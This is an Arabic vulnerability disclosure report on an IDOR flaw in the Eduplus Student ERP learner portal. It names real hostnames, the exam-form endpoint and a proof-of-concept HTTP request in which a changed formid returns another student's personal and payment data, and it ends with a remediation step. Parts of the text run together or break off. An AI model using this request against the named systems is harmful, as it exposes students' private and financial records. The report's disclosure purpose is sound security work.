
تقرير بحث تفصيلي حول ثغرة IDOR في نظام Eduplus Student ERP، بما في ذلك التحليل الفني، وإثبات المفهوم (PoC)، وتقييم الأثر، والتوصيات العلاجية.
الباحث: Vinay Sharma
يوثق هذا التقرير ثغرة أمنية عالية الخطورة تم تحديدها في منصة Eduplus Student ERP، وتحديداً في بوابة المتعلم للطلاب (learnerapi.pceterp.in). يعاني التطبيق من مرجع كائن مباشر غير آمن (IDOR) شامل في نقطة نهاية تقديم نموذج الامتحان، مما يسمح لأي مستخدم مصادق (طالب) باسترجاع البيانات الشخصية والمالية الحساسة لأي طالب آخر من خلال التلاعب بمعرفات النماذج.
تسمح هذه الثغرات بجمع بيانات واسع النطاق لسجلات الطلاب، بما في ذلك المعلومات الشخصية القابلة للتعريف (PII) وسجلات تدقيق المعاملات المالية التفصيلية.
learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in وغيرهاPOST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)تقع الثغرة في نقطة نهاية viewSubmitExamForm. يعتمد الخادم على معلمتين يوفرهما العميل لتحديد السجل المطلوب استرجاعه:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid المطلوب. من خلال التكرار عبر المعرفات الرقمية، يمكن للمهاجم الوصول إلى سجلات الطلاب الآخرين.يؤدي طلب POST قياسي إلى نقطة النهاية الضعيفة مع formid معدل إلى كشف بيانات الطلاب الحساسة.
الطلب:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (ترويسات المصادقة) ...
{"formid":"28984"}
الاستجابة (ملخص البيانات المسربة):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





جارٍ رفع Idorpoc.mp4…
يسمح الاستغلال الناجح لهذه الثغرة بما يلي:
formid المطلوب ينتمي إلى learnerid المرتبط بالجلسة النشطة. لا تثق أبداً بمعلمات formid أو Router-Path دون التحقق من صحة رمز جلسة المصادقة.